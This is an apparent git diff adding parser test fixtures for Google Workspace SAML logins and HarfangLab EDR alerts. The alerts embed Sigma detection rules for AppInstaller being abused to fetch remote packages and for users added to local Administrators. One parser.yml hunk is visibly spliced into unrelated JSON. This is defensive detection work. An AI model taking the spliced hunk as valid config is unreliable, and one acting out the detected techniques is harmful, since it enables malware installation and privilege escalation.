"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:26:15.515000Z", + "cloud": { + "account": { + "id": "C00000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, + "related": { + "ip": [ + "2.1.3.2" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "2.1.3.2", + "ip": "2.1.3.2" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "10344515534360000000", + "name": "John.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json new file mode 100644 index 000000000..de8e102d7 --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json @@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:24:58.191000Z", + "cloud": { + "account": { + "id": "C000000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS Client VPN", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, + "related": { + "ip": [ + "8.6.15.1" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "8.6.15.1", + "ip": "8.6.15.1" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "113844576558700000000", + "name": "John.doe" + } + } +} \ No newline at end of file diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 1376e0758..5050c7429 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -29,6 +29,14 @@ pipeline: input_field: "{{json_event.message.event_data.TaskContent}}" output_field: message + - name: parse_task_info_2 + filter: "{{json_event.message.eventlog.event_data.TaskContent != null and ':\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch -p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation. All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\":\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "event": { + "category": [ + "process" + ], + "dataset": "alert", + "kind": "alert", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-18T09:18:31.558000Z", + "agent": { + "id": "11111111-aaaa-bbbb-cccc-222222222222", + "name": "harfanglab" + }, + "file": { + "hash": { + "md5": "b4e821b2dac20d8d2ac6889f9c3fc315", + "sha1": "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "sha256": "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45" + } + }, + "harfanglab": { + "aggregation_key": "1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c", + "alert_subtype": "process", + "alert_time": "2024-11-18T09:18:31.852+00:00", + "alert_unique_id": "11111111-2222-3333-4444-555555555555", + "execution": 0, + "groups": [ + "{\"id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"name\": \"DOMAIN_Postes_de_travail_Windows\"}" + ], + "level": "medium", + "status": "new" + }, + "host": { + "domain": "DOMAINSI", + "hostname": "HOST01", + "name": "HOST01", + "os": { + "full": "Windows 10 Pro", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "HOST01" + }, + "process": { + "command_line": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca", + "executable": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe", + "name": "AppInstaller.exe", + "parent": { + "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p", + "executable": "C:\\Windows\\System32\\svchost.exe" + }, + "pe": { + "company": "Microsoft Corporation", + "description": "AppInstaller.exe", + "file_version": "1.24.25180.00000", + "imphash": "714FD4ADFC932C947A3949463867BE18", + "original_file_name": "AppInstaller.exe", + "product": "Microsoft Desktop App Installer" + }, + "pid": 20188, + "working_directory": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\" + }, + "related": { + "hash": [ + "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45", + "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "b4e821b2dac20d8d2ac6889f9c3fc315" + ], + "hosts": [ + "HOST01" + ], + "user": [ + "DOMAINSI\\JDOE" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "Package Installed via AppInstaller from the Internet" + }, + "url": { + "domain": "url.integration.com", + "original": "https://url.integration.com/test", + "path": "/test", + "port": 443, + "registered_domain": "integration.com", + "scheme": "https", + "subdomain": "url", + "top_level_domain": "com" + }, + "user": { + "name": "DOMAINSI\\JDOE", + "roles": "DOMAIN_Postes_de_travail_Windows" + } + } +} \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json new file mode 100644 index 000000000..19abfe567 --- /dev/null +++ b/HarfangLab/harfanglab/tests/alert_5.json @@ -0,0 +1,89 @@ +{ + "input": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "event": { + "dataset": "alert", + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T08:39:14.017000Z", + "action": { + "properties": { + "MemberName": "DOEJ", + "SubjectDomainName": "NT_DOMAIN", + "SubjectLogonId": "0x1234567", + "SubjectUserName": "sw-suser", + "SubjectUserSid": "S-1-2-4-5-6", + "TargetDomainName": "Builtin", + "TargetSid": "S-1-2-3-4", + "TargetUserName": "Administrateurs" + } + }, + "agent": { + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "harfanglab" + }, + "harfanglab": { + "aggregation_key": "8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb", + "alert_subtype": "eventlog", + "alert_time": "2024-11-12T08:39:14.017+00:00", + "alert_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "execution": 0, + "groups": [ + "{\"id\": \"11111111-2222-3333-4444-555555555555\", \"name\": \"Postes de travail\"}", + "{\"id\": \"66666666-7777-8888-9999-000000000000\", \"name\": \"Postes de travail : Lot 3\"}" + ], + "level": "medium", + "status": "new" + }, + "host": { + "domain": "NT_DOMAIN", + "hostname": "PC01", + "name": "PC01", + "os": { + "full": "Windows 10 Enterprise", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "PC01" + 